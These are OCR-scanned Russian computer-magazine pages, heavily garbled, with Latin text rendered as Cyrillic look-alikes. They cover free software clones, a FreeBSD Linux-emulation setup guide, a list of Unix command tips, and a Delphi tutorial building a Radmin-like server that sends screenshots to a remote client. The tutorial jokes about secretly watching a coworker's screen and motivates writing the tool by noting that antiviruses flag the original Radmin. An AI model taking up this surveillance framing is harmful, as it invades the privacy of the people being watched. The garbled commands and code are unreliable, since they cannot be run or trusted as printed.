проверке). 

□ Заключение 

Свободные клоны коммерческих программ с закрытым протоколом обме- 
на/форматом файлов заслужили репутацию нестабильных (ОрепОАІсе от- 
крывает далеко не все документы, созданные М5 ОАісе, и это всего лишь 
один пример). Однако ими пользуется огромное количество людей по 
всему миру, выявляя все новые ошибки и несовместимости, которые поз- 
днее исправляют разработчики, в результате чего качество свободного 
клона неуклонно растет. Но, увы, производители закрытых программ тоже 
не сидят сложа руки и выпускают новые версии, поэтому открытые клоны 
обречены на пожизненное отставание от прогресса, а хакеры вынуждены 
расходовать огромное количество времени на исследование, однако 
другого выхода нет. Если рынокуже захвачен несвободным продуктом, 
то писать что-то свое, пусть даже в десять раз лучшее, при отсутствии 
совместимости суже имеющимся — бесполезно. □□ 
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Несмотря на то что современная РгееВЗИ достаточно популярна и хорошо подходит для применения в са- 
мых различных сферах: от высоконагруженных серверов до домашних компьютеров, она все же уступает 
Ьіпііх в одном немаловажном отношении — доступности программного обеспечения. Разработчики 
коммерческого ПО неохотно портируют свои продукты во РгееВЗБ, останавливаясь на ее гораздо более 
популярном конкуренте. К счастью, есть выход — эмуляция Ьіпііх. 



О Какэто работает 

Перед тем как приступать к настройке, мы посвятим несколько минут изу- 
чению внутренней структуры и механизмов работы эмулятора І_іпих. Это 
нужно для того, чтобы в случае возникновения ошибки или каких-либо 
трудностей™ смог правильно идентифицировать и устранить проблему. 
Во-первых, эмуляция Ыпих — это вовсе не эмуляция, а имитация, прослойка, 
которая позволяет БгееВЭй выдаватьсебя за Ыпих. Несмотря нато что почти 
все серьезные ІІКІІХ-подобные операционные системы совместимы между 
собой на уровне АРІ (Арріісаііоп Ргодгаттіпд I піегіасе) и следуют стандарту 
Р05ІХ, бинарный интерфейс (АВІ — Арріісаііоп Віпагу ІпіеНасе) этих ОС в 
большинстве случаев несовпадает. Например, ЕгееВЗБ использует Си-кон- 
венцию системных вызовов, которая предусматривает передачу аргументов 
через стек, вто время как Ыпихтребует, чтобы аргументы системных вызовов 
передавались в регистрах общего назначения. Крометого, наборы систем- 
ных вызовов Ыпих и ЕгееВЗБ в некоторых местах не совпадают. 

Если исходный код программы доступен и написан с соблюдением 
общепринятых стандартов (в первую очередь, Р05ІХ) , то не составит 
труда пересобрать программу для конкретной операционной системы (о 
совместимости АВІ позаботится компилятор и низкоуровневые библио- 
теки), но что делать, если доступ к исходному коду закрыт? На этот случай 
во ЕгееВЗБ и других ВЭй-системах предусмотрен уровень совмести- 
мости, позволяющий операционной системе имитировать АВІ другой 
ІІКІІХ-подобной ОС. Благодаря этому уровню «чужие» программы даже не 
догадываются отом, что их исполнение происходит в другой операцион- 
ной системе. 



Если мы рассмотрим процесс загрузки и исполнения бинарного файла 
Ыпих во ЕгееВЗБ подробнее, то увидим следующее. Прочитав заголо- 
вок исполняемого файла, ЕгееВЗБ найдет в нем специальную метку, 
говорящую отом, что это бинарный файл Ыпих, и активизирует уровень 
совместимости, который предоставит созданному процессу таблицу 
системных вызовов, совместимую с Ыпих. При этом сам процесс будет 
помещен в сбгооі-окружение (/сот раі/іі п их) , содержащее копию среды 
Ыпих (то есть все, что может потребоваться программе во время работы, и 
в первую очередь библиотеки). Исполняясь в этой среде, процесс сможет 
обращаться ксистемным вызовам, загружать библиотеки, читать/писать 
файлы и делать все, что позволитОС. 

Несколько лет назад для запуска программ Ыпих во ЕгееВЗБ от пользо- 
вателя требовалось пометить исполняемый файл специальным флагом 
(команда «ЬгапсІеИ -I Ыпих файл»), чтобы ядро смогло определить, что 
запускается бинарный файл Ыпих, и активировать режим совместимости. 
Современные версии компиляторов выставляют та кую метку самостоя- 
тельно, и необходимость в этой процедуре воз ни кает только втом случае, 
если пользовательзапускаеточеньдревнюю программу. 

□ Настройка 

Настройкудвоичной совместимости с Ыпихусловно можно разделить на 
два этапа. Первый — это конфигурирование ядра таким образом, чтобы 
научить его правильно обрабатывать исполняемые файлы, собранные для 
Ыпих. А второй — установка Ыпих-окружения, в котором эти файлы смогут 
корректно исполняться. 



/ ііб 
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О Пространство ядра 

Длятого чтобы научить ядро РгееВЗй понимать исполняемые файлы 
Ыпих, достаточно подгрузить модуль Ііпих. ко (кісііоасі Ііпих), содержащий 
все необходимые обработчики и альтернативную таблицу системных 
вызовов. После этого операционная система фактически будет готова к 
принятию «чужого» кода. Для закрепления результата следует добавить 
строку«Ііпих_Іоасі="ѴЕ5"» в/ЬооШоасІег.сопІ 1 (загрузка одновременно 
с ядром), либо «Ііпих_епаЫе="ѴЕ5"» в/еіс/гс.соп^ (загрузка во время 
инициализации системы). 

Поклонники монолитной модели ядра могут избежать необходимости 
ручной загрузки модуля, просто включив код совместимости в ядро. Кон- 
фигурационный файл ядра должен содержать следующие строки: 



# ѴІ/5У5/І386/СОМР/0ЕМЕРІС 

орОіоп СОМРАТ_ЫШХ 
орОіоп Р8ЕІГООР8 
орРіоп ЬШРКОСРЗ 
орРіоп ЬШЗУЗРЗ 



Если сборка будет происходить для архитектуры атб64, то вместо 
СОМРАТ_иі\ІІІХ следует указать строку С0МРАТ_иЫ 11X32. Последние две 
строки указывают на то, что код Еіпих-реализаций файловых систем ргос и 
вуз также должен быть включен в ядро. Делать это не обязательно, каждая 
из них может быть собрана модулем. 

На этом настройка ядра заканчивается, и мы переходим к конфигурирова- 
нию Ыпих-окружения. 

О Пространство пользователя 

Какуже было сказано ранее, исполнение бинарных файлов Еіпих про- 
исходит в изолированном окружении, которое располагается в каталоге 
/сотраі/ііпих. Чтобы программы могли работать в таком окружении, им 
требуется доступ ко всем необходимым библиотекам, конфигурационным 
файлам и специальным файлам, вроде тех, что находятся в каталоге /ргос. 
Есть несколько способов обеспечить наличие этих файлов, мы рассмот- 
рим их все. 

□ Вариант первый. Классический 

Первый и самый правильный прием, рекомендуемый разработчиками 
ЕгееВЗй, заключается в установке окружения через коллекцию портов. 
Существует несколько портов, воссоздающих окружение времени испол- 
нения различных дистрибутивов Еіпих. В современных версиях ЕгееВЗй 
средой исполнения поумолчанию является набор пакетов из дистрибу- 
тива Еебога Соге 4 (етиІаІогз/Ііпих_Ьазе-^с4), также доступны коллек- 
ции пакетов из дистрибутива Ѳепіоо 2006.0 (Ііпих_Ьазе-деп1оо-5Іаде1 , 
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> Добавляем необходимые строки в конфигурационный файл ядра 



Переменные 5у5СІІ 

Существуеттри переменные ядра, напрямую относящихся куровню сов- 
местимости с Ыпих: сотраЕІІпих.озпате — имя имитируемой операци- 
онной системы; сотраЕІІпих.озгеІеазе — версия ядра Ыпих, стабильные 
версии ЕгееВЗй поддерживаюттолько совместимость с ядром версии 
2.4.2 (во ЕгееВЭй 7 была добавлена поддержка ядра 2.6.1 9); сот раЕ Ііпих. 
оз5_ѵегзіоп — версия интерфейса 055 (Ореп 5оипб Эузіет). 



Ііпих_Ьазе-депі:оо-5І:аде2 и Ііпих_Ьазе-деп1;оо-5ІадеЗ). По большому 
счету неважно, какой из них использовать. Необходимость в переклю- 
чении на окружение другого дистрибутива может воз никнуть только в 
случае, если программа откажется работать в среде, установленной в 
данный момент. 

В случае если Ыпих-окружение не былоустановлено во время инстал- 
ляции операционной системы, необходимо воспользоваться командой 
ркд_асИ /сбгот/раскадез/Аи/Ипих_Ьазе-1с-4_9.Ш2 (имя пакета может 
отличаться в зависимости от версии ЕгееВ50), либо пройти в каталог 
/изг/рогі5/ети[аіогз/[іпих_Ьа5е-1 : с4 и набрать«таке іпзіаіі сіеап». Пос- 
летого как одна из этих операций будет проделана, каталог/соплраіДіпих 
превратится в локальную версию дистрибутива Ыпих. 

Теперь необходимо обеспечить доступ к виртуальным файловым систе- 
мам, без этого действия некоторые программы Еіпих откажутся работать. 
Открываем файл / еЕсДзЕа Ь и добавляем в него следующие строки: 

# ѴІ/ЕТС/Р5ТАВ 

попе /сошраД/Ііпих/ргос Ііпргосіз ш 0 0 

попе /сотраЦ/ Ііпих/ зуз ііпзузіз гм 0 0 

попе /сотраД/ііпих/сІеѵ сіеѵіз гм 0 0 

Первые две строки указывают на то, что к каталогам ргос и вуз, находя- 
щимся внутри окружения Ыпих, необходимо подключить Ыпих-версии 
файловых систем ргос^з и зуз^з. Последняя же строка говорит о том, что 
к каталогу беѵтакже должна быть примонтирована родная файловая 
система беѵ!з. Это может показаться абсурдом, так как практически ни 
один специальный файл этого каталога не совпадает по имени у ЕгееВЭО 
и Ыпих. На самом деле, файловая система беѵ^з нужна только для того, 
чтобы Ыпих-программы смогли выводитьзвук, ведь интерфейс 055, 
используемый в обеих операционных системах, является стандартом и 
одинаков в Еіпих и ЕгееВЭй. 

Послетого какоперация по модификации файла /еіс/бзіа Ь будетзаконче- 
на, набираем «тоип1;-а», чтобы изменения вступили в силу. Это все, теперь 
внутритвоей ЕгееВ5й поселился самый настоящий Еіпих. Ты даже можешь 
переместиться в него, набрав от имени суперпользователя команду сбгооі 
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^ ипіхоісі 




>Для тех отважных 

ЮНИКСОИДОВ, 

что идут в ногу 
с прогрессом и 
используют пос- 
ледний срез СѴ5 
седьмой версии 
РгееВЭй, рекомен- 
дую переключить 
режим совмес- 
тимости на ими- 
тациюядра Ыпих 
версии 2.6.19: 
зузсисотраі.ііпих. 
05геІеазе=2.6.19. 
Версия 2.Д.2, 
имитируемая по 
умолчанию, уже 
не удовлетворяет 
потребностям 
современных 
Ыпих-программ. 
Коллекция портов 
РгееВЭй насчи- 
тывает несколько 
десятков так 
называемых І_іпих- 
портов. Чтобы 
найти их, находясь 
в каталоге /изг/ 
роНз, набери ко- 
манду таке зеагсб 
пате=1іпих-. 



(■ # г 

ГІ 1п г і \ іг 


1ІП 


І-ЬС _ 


Мл-л 1 1 


СиІЕу 


Щ -Г~ 


Ьі 


ІНЬ 


IV 


пѵ 




1 




1.4ч 


1 * 


№ 


№ 




/еІѵѵІвЛчіл 


івѵ 


Н^І.Н 


ът 


ІД 


і'ѵв~ 


г - Рь-/ ИІ Ч 1 л 


г. ш 


■Ч.1С 


і.я-м 


ОЛІ 


^шг 






2Еч 








ХЫлКи* 










і’ггчш 


[Гіосі'а 


■Ч.ЕМ 


* ы 


:-з 


]ИК 






ІИ4Р 


г-іѵ- 


к 


ЧЫ 




1 і чте-г 1 ! 


Г.И: 


1 й 




?■* 


■ *Ѵір 


Ч.ЕХ 




:а 


::л 


і 1 с :лі лі ■ /р- с-: 


Нгяуі '■ 


і.и 


■Ч.Сж 


Я 


ЭКЯ 


ш'гач-лГ 


!1-Ёч 


1 4т 


Н 


ІК4 















> Раздел Ыпих подключен к каталогу /сотраі/ііпих 



Развеиваем миф о драйверах 
пѵшіа 

Среди пользователей широко распространено мнение отом, что 
фирменные драйверы пѴібіа для РгееВЗй — это не что иное, как 
драйверы Ыпих, работающие в режиме совместимости с Ыпих. 
Это, конечноже, неправда, на данный момент РгееВЭО способна 
имитировать только АВІ Ыпих, а не постоянно изменяющийся 
интерфейс между ядром и драйверами. Модуль совместимости 
с Ыпих, который та к «любят» драй веры пѴібіа, нужен только 
для того, чтобы позволить пользователю играть в Ыпих-версии 
коммерческих игр. 



/сотраі/Ііпих/Ьіп/Ьазб. Все программы Ыпихтеперьдолжны за- 
пускаться и корректно работать. Это относится не только к простым 
программам, вродехсаіс, но и к комплексным, вроде 0иаке4 или 
ІІТ2004. При этом гарантируется, что программа будет работать ста- 
кой скоростью, какесли бы она была запущена в настоящем Ыпих. 

□ Вариант второй. Грязный 

Второй вариант настройки среды исполнения заключается в 
ручном копировании необходимых файлов в каталог/сотраі/ 

И п их, без использования коллекции портов или пакетов. 
Достоинство подхода в том, что он не требует выкачивания 
из сети сотен мегабайт данных и позволяет использовать уже 
имеющееся де ре во файлов Ыпих (например, взятое с дистри- 
бутивного диска). Описывать способ нет смысла, потому что 
подробности совершаемых операций зависят от дистрибутива 
Ыпих и не универсальны. В общем случае все, что требуется 
сделать, — это скопировать базовый комплект дистрибутив- 
ных пакетов и распаковать их в каталог/сотраШіпих. Это не 
тактрудно, как кажется на первый взгляд. Следуетустановить 
РгееВЭО-версию пакетного менеджера подопытного дистрибу- 
тива (например, агсЬіѵегз/грт4 или агсбіѵегз/бркд) и с его по- 
мощью накатить нужные пакеты. Впоследствии недостающие 
пакеты можно добавить, используя уже родные І_іпих-версии 
этих программ: 

УСТАНОВКА ДОПОЛНИТЕЛЬНЫХ ПАКЕТОВ 

Кесі НаС/РесІога Соге 

# /сошраС/Ііпих/Ьіп/грш -ікѵ --гооС = /сошраС/ 

Ііпих пакет . грш 

БеЬіап/ІіЬипЦи 

# /сотраС/ііпих/изг/Ъіп/сіркд -і --гооС = /сотраС/ 

Ііпих пакет . сіркд 
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□ Вариант третий. Простой 

Процесс создания среды исполнения существенно упростится, 
если дистрибутив Ыпих уже установлен на смежном разделе. В 
этом случае не потребуется даже копирование, останется только 
подключить І_іпих-раздел к каталогу ЛзотраіЛіпих, и среда испол- 
нения готова. Конечно, чтобы использовать этот прием, придется 
расместить Ыпих на файловой системе, поддерживаемой РгееВЭй 
хотя бы в режиме чтения. 

□ Вариант четвертый. Радикальный 

Четвертый и последний вариант довольно радикальный и изде- 
вательский по своей задумке. Он применим в тех случаях, когда 
Ыпих-программе необходимо обеспечить доступ к корневой 
файловой системе (например, если программа должна обра- 
щаться к«настоящей» версии каталога /еіс). СЬгооі-окружение, 
в которое помещается любой процесс Ііпих, не предоставляет 
такой возможности (в этом и заключается смысл «песочницы»). 
Но есть выход: можно просто создать ссылку /сотраѴИпих, 
указывающую на корень (гт -К/сотраШіпих && Іп -з//сотраі/ 
Ііпих), и тогда сбгооі-окружение станет идентичным корню. 
Проблема только в том, что Ыпих- про граммы не смогут работать 
с библиотеками РгееВЭО, им нужны их нативные версии. Просто 
скопировать эти библиотеки в корень не удастся по причине 
пересечения имен, поэтому следует переименовать их по оп- 
ределенной схеме (например, ІІЬс.зо.6 в ІіЬс-Іі пих.зо.6). После 
этого в файл /еІс/ІІЬтар.сопі" можно добавить та кие строки: 

# ѴІ/ЕТС/иВМАР.СОМР 

[ /іюше/изегпаше/ Ііпих] 

ІіЪс.зо.б ІіЬс-ііпих . зо . б 

1іЪс11.зо.2 ІіЪсІІ-Ііпих . зо . 2 

Итакдля всех библиотек, необходимых программе. Самиже Ыпих- 
программы следует положить в каталог/Ьоте/изегпате/Ііпих, 
именно для него будет действовать приведенное переназначение 
имен. Описанный способ может показаться слишком грубым, но он 
действительно работает и может помочь в определенных 
обстоятельствах, тг 
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шай 






юниксоида 



Доблестный юниксоид! 
Представляю твоему вни- 
манию очередную под- 
борку различных трюков, 
рекомендаций и советов, 
касающихся "піх-систем. 



ОЫеІѵѵогк 

Создание шифрованного туннеля на 10 минут 
для безопасного получения почты: 

$ ззк -2 -4 -С -К -С -Ь 8110: 
ІосаІкозС : 110 шупаше@шусіотаіп . ги \ 
зіеер 600 

Резервирование домашней директории на 
удаленном хосте: 

% Саг гсС / I ззк СгизСеЬ.Ьох. ги 

' саС > туЬаскир . Сдг' 

Оптимизация правил фильтра пакетов рР 

# рСсСІ -пѵС /еСс/рС . сопС > /гооС/ 
рС . сопС . огід 

# рСсСІ -пѵС /еСс/рС. сопС -о > 
/гооС/рС . сопС . орСітігесі 

# ЬіСС -и /гооС/рС . сопС . огід /гооС/ 
рС . сопС . орСітігесІ I Іезз 

Перехват пакетов, проходящих через беспро- 
водной сетевой интерфейс гаЮ: 

# СсрЬштѵр -пеСССі гаЮ -у ІЕЕЕ802_ 
11_ЕАБІО 

Создание ІР-псевдонима (алиаса) для 
сетевого интерфейса ІхрО с ІР-адресом 
192.168.1.1: 

# іСсопСід СхрО іпеС 
аііаз 192.168.1.2 пеСтазк 
255.255.255.255 



ТРЮКИ И СОВЕТЫ ЮНИКСОИДУ 

огнен 

Аккуратное удаление временных файлов, 
созданных более семи дней назад: 

# Сіпсі /Стр -Суре С -пате ' * 1 -тСіте 
+ 7 -ргіпСО I хагдз -0 гт -С 

Автоматизированное изменение прав досту- 
па кфайлам и директориям: 

$ Сіпсі . -Суре С -ргіпСО I хагдз -0 
сктоЬ 644 

$ Сіпсі . -Суре сЗ -ргіпСО I хагдз -0 
сктосі 7 55 

Фильтрация текстового потока по заданному 
шаблону (в данном случае пропускаем заком- 
ментированные строки): 

% дгер -ѵ ' /ч # 1 /еСс/зузсСІ . сопС 
пеС . іпеС . ір . Согѵ\/агс1іпд=1 
пеС . іпеС . езр . епаЫе=0 
пеС . іпеС . ак . епаЫе=0 
пеС . іпеС . дге . а11оѵ\/=0 

Расширенные регулярные выражения в 
действии: 



% пеСзСаС 


-па -С іпеС I 


едгер 


'801443' 


Сер 0 


0 


ОО 

О 


ЫЗТЕЫ 


Сер 0 


0 


* . 443 *.* 


ЫЗТЕЫ 



Компиляция проекта в фоновом режиме: 

# покир таке & 

Журналирование интерактивной сессии без 
использования штатной утилиты всгірС 
% кзк -і | & Сее тузеззіоп . Іод 

Пример использования множественных 
конвейеров: 

% тузді --изег=з аЬЬегсі2 -- 
раззѵ\гогсі=поіс1еа заЪЪегс12 \ 

-е ' ЗЕЬЕСТ * ЕКОМ асСіѵе' I Сдгер 
-ѵ соІІесСіоп-омпег | \ 

зогС I аѵ/к ' { ргіпС $1 } ' > /ѵаг/ 
ѵ\Плм/кСс!осз/ заЬЬег2_изегз . СхС 



ОМІ5С 

Удобный просмотр всехжурнальныхзаписей в 
реальном времени с помощью программы зсгееп 
из набора бЫІІ-утилит: 

$ ѵі ~/ . зсгеепгс 

зсгееп -С Іодгі 1 Саіі -С /ѵаг/іод/ 
аиСкІод 

зсгееп -С 1одг2 2 Саіі -С /ѵаг/іод/ 
сіаетоп 

зсгееп -С ІодгЗ 3 Саіі -С /ѵаг/іод/ 
таіііод 

зсгееп -С 1одг4 4 Саіі -С /ѵаг/іод/ 
теззадез 

зсгееп -С 1одг5 5 Саіі -С /ѵаг/іод/ 

хіегіод 

зеІесС 1 

Кодирование фильма для комфортного просмот- 
ра на КПК: 

$ тепсосіег Ьегкоѵа.аѵі -оас трЗІате 
-оѵс Іаѵс -ІаѵсорСз \ 

ѵсосіес=тред4 : ѵкд : ѵдтіп=2 : ѵ<дтах=2 0 : 
ѵтах_Ь_Сгатез=2 : ѵЬіСгаСе=100 : 
ѵдсотр=0 . 6 \ 

-ѵор зса1е=22 0 : 165 , ед=15 -оСрз 20 
-гоот -зѵ\/з 2 -ІатеорСз \ 

сЬг : Ьг=32 : ад=0 :тосіе=3 -о Ьегкоѵа_ 
рсіа . аѵі 

Создание 150-образа ОрепВЗО 4.0 своими рука- 
ми (дистрибутивные файлы из крУ/кр.орепЬзсІ. 
огд/риЬ/ОрепВ5Р/4.0/і386/ должны находиться в 
каталоге /Иоте/орепЬ5б/ітаде/4.0/і386): 

# ссі /коте/орепЬзсі 

# тккуЬгісЗ -Ь 4 . 0/і3 86/сс1гот3 9 . Сз -с 
ЬооС . саСаІод \ 

-ІгѵБЦЬЫ -кісіе ЬооС. саСаІод -кісіе- 
ЗОІіеС ЬооС. саСаІод \ 

-V "оЬзсМО" -о оЬзс340.ізо ітаде 

Уничтожение всех процессов, использующих 
/тпі/сбгот: 

# ссЗ / 

# Сизег -к -т /тпС/ссЗгот 

# итоипС /тпС/сскгот 

Примерзапуска игрового сервера из стартового 
скрипта: 

# ѵі /еСс/гс . ІосаІ 

/изг/Ьіп/зи <изегпате> -с "ссЗ /изг/ 
ІосаІ /датез/диакеЗ && /изг/1оса1/Ьіп/ 
зсгееп -сЗ -т ./дЗсіесі +ехес сопСідСіІе. 
сСд" . =Н= 
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Как же интересно наблюдать на своем мониторе за тем, что делает твой сосед по отделу, 
и понимать, что под его грозным видом скрывается человек с трогательной привязан- 
ностью к сайтам знакомств и любовью к фотографиям пятничной тематики ! Однако 
речь в этой статье пойдет совсем нео вуайеризме . . . 



□ Приступим 

В этом материале мы рассмотрим создание не- 
сколько усеченного и безвозмездного аналога 
габтіп'а. Кстати, мы испытали его в рабочих 
условиях и узнали много нового отрудовых 
буднях Никитоса. Оказывается, он, как и робот 
Бендер, интересуется кулинарными онлайн- 
передачами! Надеюсь, со временем он угостит 
нас своей ядовитой стряпней ;]. 

Итак, приступим! Первым делом разработаем 
серверную часть. Размести на форме следую- 
щие компоненты (смотри рисунок): 

• ТІсІТСРБегѵег (закладка Іпбу Бегѵегз) — как 
видишь, для работы с сетью мы будем использо- 
вать компоненты I N БУ ; 

• два ТЕсІі* — в них вводятся ІР-адрес сервера 
и номер порта, по которому будет происходить 
соединение; 

• ТВииоп с текстом «Включить сервер» — с 
помощью нее ты будешь запускать сервер, 
давая тем самым возможность подключаться 
к своей машине. В конце концов, мы же все- 
таки должны оставить пользователю право 
решать, хочет он, чтобы за ним подсматрива- 
ли, ИЛИ нет ;); 



• ТМето — в нем будет вестись лог всех осу- 
ществляемых на сервере операций; 

• ТІтаде — к нему нам потребуется две 
картинки, которые можно найти в исходниках 
программы, находящейся на диске. Зовутэти 
графические изображения еуеі .Ьгпр и еуе2. 

Ьтр, а олицетворять они будут соответственно 
включенное и выключенное состояние сервера. 
Размести компоненты на форме, какэто показа- 
но на рисунке. 

□ Кодим сервер 

Для начала создай обработчикдля кнопки 
«Включить...», который будет задавать ІР-адрес 
и номер порта для приема команд сервером. 
Делается это через свойство Віпсііпдз, оно 
является контейнером для всех сокетов, связан- 
ных с сервером (смотри врезку «Активизация 
сервера»). Далее необходимо активизировать 
сервер посредством установки свойства Асбѵе 
компонента ТІсІТСРБегѵег в Тгие, при этом 
кнопка «Включить сервер» превращается в 
«Выключить сервер» и меняется картинка в 
ТІтаде. Благодаря этому пользователь сможет 
визуально наблюдать состояние сервера. 



Листингобработчикаты найдешь в исходниках 
программы на 0Ѵ0, прилагающемуся кжурналу. 
Также нам потребуется специальная проце- 
дура Бод — она отвечаетза журналирова- 
ние действий, осуществляемых сервером. 
Объяви ее в секции риЫіс формы следующим 
образом: 

ргосесіиге ТРогтІ . Ьод ( 5 : зЪгіпд) ; 

Реализация ее очень проста: 

Мегпоі . Ьіпез . Асісі 

(ТішеТоЗДг (Тіше) + 1 ' +3); 

Иначе говоря, в ней происходит обычное до- 
бавление строки текста в ТМето. При желании 
процедуру можно модифицировать, записывая 
данные в файл или еще что-то в этом роде. 
Крометого, нам понадобится процедура для по- 
лучения скриншота экрана. Прежде чем писать 
ее, установи компонентТРЫбІтаде, который 
позволяет работать с изображениями формата 
РЫѲ (компонент прилагается к исходникам 
программы). 
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Объяви в секции риЫіс формы процедуру 
0ЕТ_5СРЕЕІ\І. Ее реализация представлена 
ниже: 

ргосесіиге ТЕогтІ . СЕТ_5СКЕЕЫ; 
ѵаг 

БезкРор: ТСапѵаз; 

В: ТВіРтар; 

VI, Н :ІпРедег; 

РЫС: ТРЫССЭДесР; 

Кигзог : ТРоіпР ; 

ТетрКесР : ТКесР ; 

Ьедіп 

СеРСигзогРоз (Кигзог) ; 

VI: = 8сгееп.Ѵ/ісІРЪ; 

Н : =зсгееп . НеідЪР ; 

ТетрКесР : =КесР (Кигзог .х, Кигзог . 
у , Кигзог . х+10 , Кигзог .у+10 ) ; 

В : =ТВіРтар . СгеаРе ; 

В . ТлГісЗ-РІп : =ѴГ ; 

В . НеідЪР : =Н; 

БезкРор : =ТСапѵаз . СгеаРе ; 

Ргу 

міРЪ. БезкРор бо 

Напсііе : = СеРТДіпскжБС (СеРБезкРо 
рЭДіпскж) ; 
міРЪ В.Сапѵаз бо 
Ъедіп 

ВгизЪ . Соіог : =с1Сгееп; 

СоруКесР (КесР (0, 0, м, Ъ) , 
БезкТор , 

КесР ( 0 , 0 , м, Ъ) ) ; 

РіІІКесР (ТетрКесР) ; 
епб; 

РЫС := ТРШОЪд есР. СгеаРе; 

РЫС. Аззідп (В) | 

РЫС . ЗаѵеТоЕіІе (ЕхРгасРРіІеРаР 
Ъ (АррІісаРіоп . ЕхеБаше) + 1 \ ' + ' з . 
рпд ' ) ; 



Ріпаііу 
БезкТор . Егее; 

В . Егее; 

РШ.Егее; 

епб; 

епб; 

С помощью этой процедуры мы получим скрин- 
шотэкрана, вместо курсора сделаем зеленый 
прямоугольник, для чего используем функции 
ѲеЮигзогРоз, Ресі и ЕІІІРесР Полученный 
графический образ мы сохраняем в файлез.рпд 
(комментарии к кодуты найдешь в исходниках 
программы). 

Итак, мы подошли к за ключ ительн ому этапу созда- 
ния сервера. Сделай обработчикОпЕхесиіе 
компонента ТІсІТСРЗегѵег, в котором будет 
происходитьанализ присланных команд от 
клиента (на основании их будут совершаться 
необходимые нам действия). 

ргосесіиге ТЕогтІ . ІбТСРЗегѵегІЕхе 
сиРе (АТЪгеаб : ТІбРеегТЪгеаб) ; 
ѵаг 

2 : зРгіпд; 

РзРгеат: ТЕіІеЗРгеат; 

X , У : іпРедег ; 

К : ТРоіпР ; 

Ъедіп 

МІРЪ АТЪгеаб . СоппесРіоп бо 
Ъедіп 

//Читаем, что прислало нам кли- 
ентское приложение 
2 : = КеабБп; 

іі ЗатеТехР (Сору ( 2 , 1, 11), 

1 деР_зсгееп 1 ) РЪеп 
Ъедіп 

Бод ( 1 Запрошен скриншот 1 ) ; 
СЕТ_ЗСКЕЕЫ; 

РЗРгеат := ТЕіІеЗРгеат. СгеаРе 
(ЕхРгасРЕіІеРаРЪ (АррІісаРіоп . 
ЕхеБате ) + 1 \ ’ + 1 з . рпд 1 , 



ПОЛЕЗНАЯ ИНФОРМАЦИЯ 

Іпбу представляет собой набор клас- 
сов ОЬіесІ; Разсаі для работы с сетью 
(в частности, с интернетом). Так, класс 
ТИТСРСоппесбоп предоставляет базовые 
функции для низкоуровневой работы с 
сетевыми сервисами. Одним из главных 
достоинств Іпбу является встроенный ме- 
ханизм многопоточности (тиШ-іЬгеабіпд). 
Стоит отметить, что компоненты Іпбу входят 
в комплект поставки ОеІрЬІ и очень просты 
в использовании. Например, ты можешь 
запросто создать ЕТР-сервер или почтовый 
клиент, при этом написав минимум кода и 
не вникая втехнологию реализации сете- 
вых протоколов. 



РтОрепКеаб + 

РтЗЪагеБепуЫопе) ; 

/ /ПЕРЕДАЕМ файл клиентскому 
приложению 
ОрепШгіРеВиРРег; 

Бод ( 1 Передаем файл з . рпд * ) ; 
ѴЪгіРеЗРгеат ( РЗРгеат) ; 

Бод ( 1 Файл передан 1 ) ; 
СІозеТАЪгіРеВиРРег; 

ЕгееАпсШіІ (РЗРгеат) ; 
епб; 

//Обработка остальных команд 

АТЪгеаб . СоппесРіоп . БізсоппесР ; 
епб; 
епб; 

Здесь приведен лишь фрагмент кода обработ- 
чика ОпЕхесиІе, который отправляет скриншот 
экрана. Остальную часть ты найдешь в исход- 
никах программы, расположенной на диске. 
Поговорим более детально о командах, кото- 
рые может принимать наш сервер; с первой 
мы уже знакомы, это «деІ_зсгееп». Остальные 
представлены на схеме, изображенной на 



«ЗАЧЕМ ПИСАТЬ СВОЙ РАОМШ? НЕ ПОВЕРИШЬ, НО 
МНОГИЕ АНТИВИРУСЫ ТЕПЕРЬ ПРЕДУПРЕЖДАЮТ 
ПОЛЬЗОВАТЕЛЯ НЕ ТОЛЬКО О ЗАПУСКЕ (!), НО ДАЖЕ 
О НАЛИЧИИ ОРИГИНАЛЬНОГО РАОМШ’А НАЖЕСТ- 
КОМ ДИСКЕ, НЕ БЕЗ ОСНОВАНИЙ СЧИТАЯ ЕГО ПРО- 
ГРАММОЙ КАК МИНИМУМ ПОДОЗРИТЕЛЬНОЙ» 
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НЕСКОЛЬКО СЛОВО ФОРМАТЕ РЫО 

В 1 978 году израильские исследо- 
ватели Яков Зив ДасоЬ 2іѵ) и Абрам 
Лемпел (АЬгаИагш БетреІ.) изобрели 
новый алгоритм компрессии данных 
без потерь, названный 1278. Публика- 
ция алгоритма была открытой, любой 
человек мог взять и использовать его 
для своих целей, и в 1987 году сотруд- 
никкомпании СотриЗегѵе Боб Берри 
(ВоЬ Веггу) разработал на основе І_2ѴѴ 
новый форматхранения изображений 
— ѲгарЫс ІпіегсЬапде Рогтаі (ѲІР). В 
декабре 1 994 года было объявлено, что 
за использование алгоритма І_278 нужно 
выплачивать лицензионные отчисления 
разработчикам. Таким образом, исполь- 
зование формата 6ІР стало платным. 
После этого была создана рабочая 
группа под руководством Томаса Боутела 
(ТЬогпав ВоіЛеЩ, которая решала задачу 
по разработке альтернативы ѲІР. Новый 
формат получил название РІ\І6 (РогіаЫе 
ЫеП/ѵогк ѲгарЫсз). 



АКТИВИЗАЦИЯ СЕРВЕРА 

ІсІТС РБегѵегІ . ВіпсІіпдз.АсІсІ; 

ІсІТС РБегѵегІ .ВіпсІіпдз.кетзСО]. 
ІР:=ІРабгеББ.ТехѲ 

ІсІТС РБегѵегІ .ВіпсІіпд5.І1;ет5[0]. Рог1;:=Бі;гТоІ 
пі(Рогі[\ІитЬег.Тех1:); 

ІсІТС РБегѵегІ .Асбѵе:=1гие; 



рисунке. Во время обращения к серверу каж- 
дый клиент создает свой собственный поток. 
Информация о нем содержится в переменной 
АТИгеаб, из которой мы читаем присланную 
команду с помощью функции РеасИп. Далее с 
помощью функции ЗатеТехі мы осуществляем 
проверку того, является ли присланная коман- 
да разрешенной. Затем создаем поток и через 










> Сервер удаленного администрирования 
в действии 

него передаем файл клиенту, после чего рвем 
соединение, так как запрошенное действие 
выполнено. 

О Проектируем и пишем клиентскую часть 

Я уже чувствую нетерпение, с которым ты 
хочешь приступить ктестированию разра- 
ботанной тобой утилиты. Конечно, хочется 
расслабиться, откинувшись на спинку кресла 
(копирайт на эту фразу по-прежнему находится 
у инсталлятора ѴѴІпбоѵѵз 98) и, никуда не бегая, 
решать (или создавать) все проблемы пользо- 
вателей удаленно. Вот и отлично! Нам остался 
последний рывок — разработка клиентской 
части. 

Создай новое приложения, не забыв при этом 
сохранить старое. Размести на форме следую- 
щие компоненты: 

